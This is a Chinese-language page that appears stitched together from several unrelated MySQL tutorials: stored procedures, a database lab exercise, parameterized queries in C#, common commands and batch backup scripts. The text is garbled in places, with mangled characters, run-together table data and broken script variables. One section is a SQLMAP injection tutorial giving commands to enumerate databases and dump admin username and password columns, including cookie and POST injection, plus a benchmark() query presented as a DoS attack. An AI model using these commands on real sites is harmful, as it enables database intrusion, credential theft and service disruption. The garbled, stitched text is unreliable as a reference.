mysql分享(1)-sql语句执行的11个步骤

mysql 块语句MySQL 块语句，也称为“存储过程”，是一种 SQL 命令集合，能够以单个单位的方式执行多个 SQL 查询。

通俗来讲，就是把多条 SQL 语句封装成一个单元，然后该单元可以像函数一样被调用执行。

与函数不同的是，块语句可以带有“输入参数”和“输出参数”，可更方便地实现复杂的逻辑业务处理。

下面我们来详细了解MySQL块语句的功能和应用。

#### 1.创建块语句：CREATE PROCEDURE 存储过程名称 (IN/OUT/INOUT 参数名1 数据类型,...) BEGIN SQL语句; END;需要注意以下几点：1. 创建块语句时不要遗漏“BEGIN”和“END”。

2. 传递数据时，根据实际情况使用 IN/OUT/INOUT 型参数，简要说明如下：- IN 输入型参数，是外部数据传入块语句的数据，块语句只有读取数据的权限，并无写入权限；- OUT 输出型参数，是块语句执行后输出结果给外界的数据；- INOUT 双向型参数，既能够从外界向块语句进行数据传递，也能从块语句向外界返回结果数据。

#### 2.块语句的调用：调用块语句的基本语法为 CALL 存储过程名称([参数1, 参数2, …])，注意参数个数和类型需要与存储过程定义相同。

例如：``` DELIMITER // --自定义语句结束标识符CREATE PROCEDURE getStudentById(IN studentId INT, OUT studentName VARCHAR(20)) BEGIN SELECT name INTO studentName FROM student WHERE id = studentId LIMIT 1; END //CALL getStudentById(1, @name); SELECT @name;```解析：- 使用 DELIMITER // 自定义语句结束标识符，防止SQL 语句中含有 ; 导致语法出错。

数据库原理与设计（MySQL版）附录A MySQL实验指导实验一数据库和表的管理一、实验目的1. 了解MySQL数据库的逻辑结构和物理结构的特点。

2. 学会使用SQL语句创建、选择、删除数据库。

3. 学会使用SQL语句创建、修改、删除表。

4. 学会使用SQL语句对表进行插入、修改和删除数据操作。

5. 了解MySQL的常用数据类型。

二、实验内容1. 使用SQL语句创建数据库studentsdb。

2. 使用SQL语句选择studentsdb为当前使用数据库。

3. 使用SQL语句在studentsdb数据库创建数据表student_info、curriculum、grade，三个表的数据结构如表1-表3所示。

表1 student_info表结构表2 curriculum表结构列名数据类型允许NULL值主键课程编号char(4) 否是课程名称varchar(50) 是否学分int 是否表3 grade表结构列名数据类型允许NULL值主键学号char(4) 否是课程编号char(4) 否是分数int 是否4. 使用SQL语句INSERT向studentsdb数据库的student_info、curriculum、grade 表插入数据，各表数据如表4-表6所示。

表4 student_info表的数据表6 grade表的数据学号课程编号分数0001 0001 800001 0002 910001 0003 880001 0004 850001 0005 770002 0001 730002 0002 680002 0003 800002 0004 790002 0005 730003 0001 840003 0002 920003 0003 810003 0004 820003 0005 755.使用SQL语句ALTER TABLE修改curriculum表的“课程名称”列，使之为空。

6. 使用SQL语句ALTER TABLE修改grade表的“分数”列，使其数据类型为decimal(5,2)。

SQLMAP注⼊教程-11种常见SQLMAP使⽤⽅法详解⼀、SQLMAP⽤于Access数据库注⼊(1) 猜解是否能注⼊1 2win:python sqlmap.py -u "" Linux :.lmap.py -u ""(2) 猜解表1 2win:python sqlmap.py -u ""--tables Linux:.lmap.py -u ""--tables(3) 根据猜解的表进⾏猜解表的字段(假如通过2得到了admin这个表)1 2win:python sqlmap.py -u ""--columns -T admin Linux:.lmap.py -u ""--columns -T admin(4) 根据字段猜解内容(假如通过3得到字段为username和password)1 2 3win:python sqlmap.py -u ""--dump -T admin -C "username,password" Linux:.lmap.py -u ""--dump -T admin -C"username,[url=]B[/url]password"⼆、SQLMAP⽤于Cookie注⼊(1) cookie注⼊，猜解表1win :python sqlmap.py -u ""--cookie "id=31" --table --level 2 (2) 猜解字段，(通过1的表猜解字段，假如表为admin)1 2win :python sqlmap.py -u ""--cookie "id=31" --columns -T admin --level 2(3) 猜解内容1 2win :python sqlmap.py -u ""--cookie "id=31" --dump -T admin -C "username,password"--level 2三、SQLMAP⽤于mysql中DDOS攻击(1) 获取⼀个Shell1 2 3 4win:python sqlmap.py -u [url]http://192.168.159.1/news.php?id=1[/url] --sql-shell Linux:sqlmap -u [url]http://192.168.159.1/news.php?id=1[/url] --sql-shell(2) 输⼊执⾏语句完成DDOS攻击1select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)四、SQLMAP⽤于mysql注⼊(1) 查找数据库1python sqlmap.py -u ""--dbs(2) 通过第⼀步的数据库查找表(假如数据库名为dataname)1python sqlmap.py -u ""-D dataname --tables(3) 通过2中的表得出列名(假如表为table_name)1python sqlmap.py -u ""-D dataname -T table_name --columns(4) 获取字段的值(假如扫描出id,user,password字段)1 2python sqlmap.py -u ""-D dataname -T table_name -C "id,user,password"--dump五、SQLMAP中post登陆框注⼊(1) 其中的search-test.txt是通过抓包⼯具burp suite抓到的包并把数据保存为这个txt⽂件我们在使⽤Sqlmap进⾏post型注⼊时，经常会出现请求遗漏导致注⼊失败的情况。

mysql学习笔记（⼀）之mysqlparameter基础琐碎总结-----参数化查询参数化查询（Parameterized Query ）是指在设计与数据库链接并访问数据时，在需要填⼊数值或数据的地⽅，使⽤参数 (Parameter) 来给值，这个⽅法⽬前已被视为最有效可预防SQL注⼊攻击 (SQL Injection) 的攻击⼿法的防御⽅式。

下⾯将重点总结下Parameter构建的⼏种常⽤⽅法。

说起参数化查询当然最主要的就是如何构造所谓的参数：⽐如，我们登陆时需要密码和⽤户名，⼀般我们会这样写sql语句，Select * from Login where username= @Username and password = @Password，为了防⽌sql注⼊，我们该如何构建@Username和@Password两个参数呢，下⾯提供六种（其实⼤部分原理都是⼀样，只不过代码表现形式不⼀样，以此仅作对⽐，⽅便使⽤）构建参数的⽅法，根据不同的情况选⽤合适的⽅法即可：说明：以下loginId和loginPwd是户登陆时输⼊登陆⽤户名和密码，DB.conn是数据库连接，⽤时引⼊using System.Data.SqlClient命名空间⽅法⼀：SqlCommand command = new SqlCommand(sqlStr, DB.conn);command.Parameters.Add("@Username", SqlDbType.VarChar);command.Parameters.Add("@Pasword", SqlDbType.VarChar);command.Parameters["@Username"].Value = loginId;command.Parameters["@Pasword"].Value = loginPwd;⽅法⼆：SqlCommand command = new SqlCommand();command.Connection = DB.conn;mandText = sqlStr;command.Parameters.Add(new SqlParameter("@Username", loginId));command.Parameters.Add(new SqlParameter("@Pasword", loginPwd));⽅法三：Sqlcommand cmd=new Sqlcommand(sqlStr, DB.conn);cmd.parameters.add("@Username",DbType.varchar).value=loginId;cmd.parameters.add("@Pasword",DbType.varchar).value=loginPwd;⽅法四：Sqlcommand cmd=new Sqlcommand(sqlStr, DB.conn);cmd.parameters.addwithvalue("@Username",loginId);cmd.parameters.addwithvalue("@Pasword",loginPwd);⽅法五：Sqlcommand cmd=new Sqlcommand(sqlStr, DB.conn);SqlParameter para1=new SqlParameter("@Username",SqlDbType.VarChar,16);para1.Value=loginId;cmd.Parameters.Add(para1);SqlParameter para2=new SqlParameter("@Pasword",SqlDbType.VarChar,16);para2.Value=loginPwd;cmd.Parameters.Add(para2);⽅法六：SqlParameter[] parms = new SqlParameter[]{new SqlParameter("@Username", SqlDbType.NVarChar,20),new SqlParameter("@Pasword", SqlDbType.NVarChar,20),};SqlCommand cmd = new SqlCommand(sqlStr, DB.conn);// 依次给参数赋值parms[0].Value = loginId;parms[1].Value = loginPwd;//将参数添加到SqlCommand命令中foreach (SqlParameter parm in parms){cmd.Parameters.Add(parm);}法和实现⽅法的不同，也可以说是语法糖，但后记：鉴于园友对dedeyi，⿁⽕飘荡，guihwu的疑问，我在写⼀个说明。

mysql常⽤语句⼤全最常⽤的显⽰命令：1、显⽰数据库列表。

show databases;2、显⽰库中的数据表：use mysql;show tables;3、显⽰数据表的结构：describe 表名;4、建库：create database 库名;5、建表：use 库名；create table 表名 (字段设定列表)；6、删库和删表:drop database 库名;drop table 表名；7、将表中记录清空：delete from 表名;(这个清空表只是把数据表内容数据清掉，⾃增id不会被清掉，⾃增id会保留)truncate table 表名；（成功返回0）（⾃增id也⼀同会被清掉）truncate与delete的区别：a.事务：truncate是不可以rollback的，但是delete是可以rollback的；原因：truncate删除整表数据(ddl语句,隐式提交)，delete是⼀⾏⼀⾏的删除，可以rollbackb.效果：truncate删除后将重新⽔平线和索引(id从零开始) ,delete不会删除索引c.truncate 不能触发任何Delete触发器。

d.delete 删除可以返回⾏数8、显⽰表中的记录：select * from 表名连接MySQL格式: mysql -h 主机地址 -u⽤户名 -p⽤户密码例 1:连接到本机上的 MySQL。

mysql -uroot -pmysql;连接到远程主机上的 MYSQL。

mysql -h 127.0.0.1 -uroot -pmysql;2、连接到远程主机上的MYSQL。

假设远程主机的IP为：110.110.110.110，⽤户名为root,密码为abcd123。

则键⼊以下命令：mysql -h110.110.110.110 -u root -p 123;（注:u与root之间可以不⽤加空格，其它也⼀样）3、退出MYSQL命令： exit （回车）修改新密码在终端输⼊：mysql -u⽤户名 -p密码，回车进⼊Mysql。

mysql批处理命令执⾏多个sql脚本⽅法1若有SQL脚本a.sql, b.sql, 其⽬录在f盘根⽬录下, 则可再写⼀个SQL脚本c.sql(假设其⽬录也在f盘根⽬录下, 也可以在其他路径下)如下: source f:/a.sql;source f:/b.sql;然后执⾏source f:/c.sql 即可.⽅法2⽅法1的不便之处在于, 要为每个脚本写⼀句代码, 若有成千上万个, 这样写便不现实. 此时, 可⽤批处理来实现.以执⾏f:\test\⽬录下所有的SQL脚本为例, 其批处理代码如下:@echo offfor %%i in (f:\test*.sql) do (echo excute %%imysql -uroot -p123456 < %%i)echo successpause其中: do后⾯的左括号要跟在do后, 若放在do的下⼀⾏, 则出会出现⼀闪⽽过的情况, 数据库脚本有没有执⾏没有去查看.若是当前⽬录下, 可将”f:\test*.sql” 改为”.*.sql” 即可.注意在SQL脚本中写上 use db_name.批处理命令备份mysql数据库本⽂转⾃MySQL数据的备份⼯具也许有很多，在这我要给⼤家分享⼀下通过DOS批处理命令和MySQL、WinRAR命令来进⾏备份⼯作。

⼯作环境 Windows Server 2003 ，MySQL安装⽬录 D:\MySQL , WinRAR 安装⽬录 C:\Program Files\WinRAR\WinRAR.exe备份数据存储的路径为 E:\数据备份，好了下⾯开始写DOS批处理命令了。

复制代码代码如下:set “Ymd=�te:~,4%�te:~5,2%�te:~8,2%”md “E:\数据备份\%ymd%”“D:\MySQL\bin\mysqldump.exe” –opt -Q mysql -uroot -p123456789 > E:\数据备份\%Ymd%\mysql.sqlREM ….. 这⾥可以添加更多的命令，要看你有多少个数据库，其中 -Q 后⾯是数据库名称 -p紧跟后⾯是密码echo Winrar loading…“C:\Program Files\WinRAR\WinRAR.exe” a -ep1 -r -o+ -m5 -df “E:\数据备份\%Ymd%.rar” “E:\数据备份\%Ymd%”echo OK!把上⾯的命令保存为 backup.bat ，双击运⾏，就开始备份数据了。